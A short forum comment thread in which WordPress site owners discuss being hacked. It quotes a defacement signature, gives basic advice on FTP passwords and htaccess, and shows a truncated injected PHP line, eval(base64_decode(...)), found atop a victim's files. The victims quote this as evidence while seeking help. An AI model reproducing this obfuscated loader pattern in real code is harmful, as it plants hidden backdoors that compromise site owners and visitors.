  18. The following is a common hack, but I can not seem to find the common fix.

    .:: HACKED By R3YR3 ::. | r3yr3[dot]m4iL[at]gmail[dot]com |

  19. If a person’s site is still being hacked, till you can find another way to keep them out, you should be the only one going in and only from home – one place. Do google searches and learn about htaccess files. then, if possible, make use of them.

    To keep everyone but you out of admin, make sure no one but you knows your FTP password. Change it before you do anything else, and again afterwards. Several ftp id’s and pw’s can be created by a hacker once he is in. Go to your cPanel (?) and make sure that there are none created that you do not know about – probably none. period. If a hacker can get in with ftp, they can shoot down your htaccess file also.

  20. My site was hacked today. I have this code:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9");

    at the top of all of my PHP files.

    I think I need to do a complete re-install. I don't have the WordPress folder backed up, but I do have a clean backup of my database. So, can I just delete my current installation and database, install a new wordpress and then restore the database? Or is it more complicated?

    Thanks
